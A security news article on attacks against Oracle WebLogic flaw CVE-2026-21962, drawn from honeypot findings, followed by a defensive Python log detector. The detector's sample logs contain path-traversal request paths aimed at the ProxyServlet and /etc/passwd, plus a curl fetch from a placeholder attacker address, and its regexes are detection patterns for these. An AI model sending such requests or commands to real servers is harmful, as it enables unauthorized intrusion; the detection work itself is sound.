Zero-Day Window Slams Shut Instantly
The flaw, tracked as CVE-2026-21962, carries a perfect CVSS score of 10.0, the highest possible rating for a vulnerability.
It allows unauthenticated attackers to remotely execute arbitrary operating system commands on vulnerable WebLogic servers without needing any credentials.
Exploitation began on January 22, 2026, the exact day the proof-of-concept code went public, leaving organizations with virtually no reaction time.
Researchers from CloudSEK deployed a high-interaction honeypot simulating a vulnerable Oracle WebLogic Server and monitored attacker behavior over a 12-day observation period.
The data captured an immediate and aggressive surge in automated scanning and exploitation attempts targeting the flaw.
Attackers exploit CVE-2026-21962 by sending specially crafted HTTP GET requests that use path traversal techniques to reach proxy endpoints.
This trick bypasses the server’s authentication layer entirely, allowing adversaries to run any command on the underlying operating system, effectively taking full control of the affected server.
The attack infrastructure was primarily built on rented Virtual Private Servers, with hosting providers such as HOSTGLOBAL.PLUS and DigitalOcean frequently abused to mask the true origin of attacks and to scale operations.
Automated tools such as the botnet scanner libredtail-http and the Nmap Scripting Engine generated the highest volume of malicious requests.
Older Vulnerabilities Still Under Fire
The honeypot also detected persistent exploitation of several older, equally critical WebLogic vulnerabilities that threat actors have refused to abandon:
- CVE-2020-14882 / CVE-2020-14883 (CVSS 9.8): Allows attackers to bypass login screens and seize full server control via malicious HTTP POST requests to the admin console.
- CVE-2020-2551 (CVSS 9.8): A deserialization flaw in the IIOP protocol enables remote code execution by sending a crafted Java object to a JNDI console endpoint.
- CVE-2017-10271 (CVSS 9.8): Allows malicious code execution by sending a specially crafted XML payload to the WLS-WSAT component.
Researchers also noted a broad “spray and pray” strategy, with attackers probing honeypot servers for non-Oracle flaws, including well-known Hikvision and PHPUnit vulnerabilities, demonstrating how quickly threat actors adapt generic web reconnaissance tools to find any available entry point.
Security teams must act without delay to reduce exposure:
- Apply patches immediately: Install Oracle’s Critical Patch Update for January 2026, which addresses CVE-2026-21962 across all affected WebLogic and proxy components.
- Restrict console access: The WebLogic administrative console must never be exposed to the public internet. Enforce access only through strict firewall rules, VPNs, or isolated internal networks.
- Limit protocol exposure: Block or restrict network access to sensitive protocols like IIOP/T3 and WLS-WSAT from untrusted network segments.
- Deploy a Web Application Firewall (WAF): Configure WAF rules to detect and block path traversal sequences and known exploit signatures targeting the ProxyServlet.
- Enhance log monitoring: Actively monitor for unusual system command executions, such as unexpected wget or curl calls, which can indicate a successful breach in its early stages.
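As an added example (not code from the article or from CloudSEK), the following Python detector applies the WAF and log-monitoring points above to constructed sample log lines: it flags path-traversal sequences aimed at the ProxyServlet in a web access log, and wget or curl invocations spawned by the WebLogic Java process in a process audit log. The log formats, the "parent=java" heuristic for an unexpected call, and every address and path in the samples are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Traversal as it appears in raw URL paths: "../", the "..;/" variant, and
# single- or double-URL-encoded dots/slashes (matched again after decoding).
TRAVERSAL = re.compile(r"\.\.(;?/|%2f|%252f)|%2e%2e|%252e%252e", re.IGNORECASE)
PROXY_HINT = re.compile(r"ProxyServlet", re.IGNORECASE)  # component named in the article
DOWNLOADER = re.compile(r"(^|/)(wget|curl)\b")           # early post-exploitation indicators
# Log formats (NCSA-style access log, key=value process audit) are assumptions.
ACCESS_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
PROC_LINE = re.compile(r'parent=(\S+) .*?cmd="([^"]*)"')

def flag_access_line(line):
    """Return a finding for a suspicious access-log line, or None."""
    m = ACCESS_LINE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    decoded = unquote(unquote(path))  # peel up to two layers of URL encoding
    reasons = []
    if TRAVERSAL.search(path) or TRAVERSAL.search(decoded):
        reasons.append("path-traversal")
    if PROXY_HINT.search(decoded):
        reasons.append("proxy-endpoint")
    return {"client": client, "method": method, "status": status, "reasons": reasons} if reasons else None

def flag_process_line(line):
    """Flag wget/curl spawned by the WebLogic JVM (parent=java), or None."""
    m = PROC_LINE.search(line)
    if m and m.group(1) == "java" and DOWNLOADER.search(m.group(2)):
        return {"parent": m.group(1), "cmd": m.group(2)}
    return None

# Constructed sample lines; addresses and paths are placeholders, not real indicators.
ACCESS_LOG = [
    '198.51.100.7 - - [22/Jan/2026:10:15:03 +0000] "GET /console/..;/ProxyServlet HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Jan/2026:10:15:05 +0000] "GET /app/%252e%252e%252fProxyServlet HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Jan/2026:10:15:09 +0000] "GET /../../etc/passwd HTTP/1.1" 404 0',
    '203.0.113.5 - - [22/Jan/2026:10:16:10 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2048',
]
PROCESS_LOG = [
    '2026-01-22T10:15:04Z host=wls01 parent=java user=weblogic cmd="curl -s http://198.51.100.7/x"',
    '2026-01-22T10:20:00Z host=wls01 parent=bash user=ops cmd="curl -s https://updates.example.invalid/"',
]

def scan(access_log=ACCESS_LOG, process_log=PROCESS_LOG):
    """Run both detectors and return all findings in log order."""
    return [f for f in map(flag_access_line, access_log) if f] + \
           [f for f in map(flag_process_line, process_log) if f]
```

Running scan() on the constructed samples yields four findings: two traversal requests that also name the ProxyServlet, one generic traversal probe, and one curl call launched from the Java process; the benign login page request and the operator's curl are not flagged.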
The pattern of immediate exploitation following public disclosure reinforces a critical security truth: for maximum-severity vulnerabilities, patch windows are measured in hours, not weeks.
The post Active Attacks Target Critical WebLogic Remote Code Execution Flaws appeared first on Cyber Security News.
